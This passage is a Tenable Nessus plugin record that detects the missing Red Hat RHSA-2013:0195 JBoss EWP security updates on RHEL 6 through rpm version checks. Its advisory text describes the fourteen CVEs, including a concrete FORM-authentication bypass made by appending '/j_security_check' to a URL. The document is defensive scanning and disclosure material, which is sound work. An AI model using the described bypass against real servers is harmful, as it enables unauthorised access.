"p-cpe:/a:redhat:enterprise_linux:rhq-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-plugin-validator", "p-cpe:/a:redhat:enterprise_linux:rhq-pluginAnnotations", "p-cpe:/a:redhat:enterprise_linux:rhq-pluginGen", "p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-rtfilter", "p-cpe:/a:redhat:enterprise_linux:spring2", "p-cpe:/a:redhat:enterprise_linux:spring2-agent", "p-cpe:/a:redhat:enterprise_linux:spring2-all", "p-cpe:/a:redhat:enterprise_linux:spring2-aop", "p-cpe:/a:redhat:enterprise_linux:spring2-beans", "p-cpe:/a:redhat:enterprise_linux:spring2-context", "p-cpe:/a:redhat:enterprise_linux:spring2-core", "p-cpe:/a:redhat:enterprise_linux:wss4j", "p-cpe:/a:redhat:enterprise_linux:xerces-j2", "p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts", "p-cpe:/a:redhat:enterprise_linux:xml-commons", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which10", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which11", "p-cpe:/a:redhat:enterprise_linux:xml-security", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2013-0195.NASL", "href": "https://www.tenable.com/plugins/nessus/78945", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0195. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78945);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5066\", \"CVE-2011-1096\", \"CVE-2011-2487\", \"CVE-2011-2730\", \"CVE-2011-2908\", \"CVE-2011-4575\", \"CVE-2012-0034\", \"CVE-2012-0874\", \"CVE-2012-2377\", \"CVE-2012-2379\", \"CVE-2012-3369\", \"CVE-2012-3370\", \"CVE-2012-3546\", \"CVE-2012-5478\");\n script_xref(name:\"RHSA\", value:\"2013:0195\");\n\n script_name(english:\"RHEL 6 : JBoss EWP (RHSA-2013:0195)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated JBoss Enterprise Web Platform 5.2.0 packages that fix multiple\nsecurity issues, various bugs, and add several enhancements are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Web Platform 5.2.0 release serves as a\nreplacement for JBoss Enterprise Web Platform 5.1.2, and includes bug\nfixes and enhancements. As JBoss Enterprise Web Platform is a subset\nof JBoss Enterprise Application Platform, refer to the JBoss\nEnterprise Application Platform 5.2.0 Release Notes for information on\nthe most significant of these changes. 
The Release Notes will be\navailable shortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain\ntext of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing\nsymmetric keys (for XML encryption), allowing a remote attacker to\nrecover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary\ncode in the context of the application server, or to obtain sensitive\ninformation from the server. Manual action is required to apply this\nfix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by\na Supporting Token, but not whether the correct token was used. A\nremote attacker could transmit confidential information without the\nappropriate security, and potentially circumvent access controls on\nweb services exposed via Apache CXF. Refer to the Solution section for\ndetails. (CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another\ncomponent that calls request.setUserPrincipal() before the call to\nFormAuthenticator# authenticate() (such as the Single-Sign-On valve),\nit was possible to bypass the security constraint checks in the FORM\nauthenticator by appending '/ j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote\nattacker to hijack the authenticated JMX Console session of an\nadministrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. 
(CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential\nif no security context was provided. Depending on the deployed\napplications, this could possibly allow a remote attacker to hijack\nthe credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing\nlocal users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain\ntext when an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the\nlog file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct\nexploitation of this flaw. If the interceptor was misconfigured or\ninadvertently disabled, this flaw could lead to arbitrary code\nexecution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication\nwhen a JGroups channel was started, allowing attackers on the adjacent\nnetwork to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call\nif a null password was provided. In non-default configurations this\ncould possibly lead to a remote attacker hijacking a\npreviously-authenticated user's session. 
(CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum\nfor reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project\nfor reporting CVE-2012-2379; and Tyler Krpata for reporting\nCVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by\nCarlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of\nRed Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and\nCVE-2012-2377 was discovered by Red Hat.\"\n );\n # https://access.redhat.com/knowledge/docs/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/documentation/en-us/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0195\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0034\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2379\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3546\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-5478\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3370\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2730\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0874\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:aopalliance\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bsh2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bsh2-bsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:google-guice\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hsqldb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jacorb-jboss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:javassist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-aop2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-logmanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-naming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-reflect\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-vfs2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web-tp-licenses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web-ws-native\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf-ewp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbosssx2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-framework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jgroups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-federation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-ant-bundle-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-common-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-dbutils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-domain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugindoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-filetemplate-bundle-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-plugin-validator\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:rhq-pluginAnnotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-pluginGen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-rtfilter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-aop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-context\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wss4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-security\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0195\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"jboss-seam2-\")) || rpm_exists(rpm:\"jbossas-welcome-content-eap\")) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EWP\");\n\n if (rpm_check(release:\"RHEL6\", reference:\"aopalliance-1.0-5.3.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"apache-cxf-2.2.12-6.1.patch_04.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"bsh2-2.0-0.b4.15.patch01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"bsh2-bsf-2.0-0.b4.15.patch01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"glassfish-jaxb-2.1.12-12_patch_03.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"google-guice-2.0-3.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate3-3.3.2-1.9.GA_CP05.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate3-annotations-3.4.0-3.6.GA_CP05.ep5.el6\")) flag++;\n if 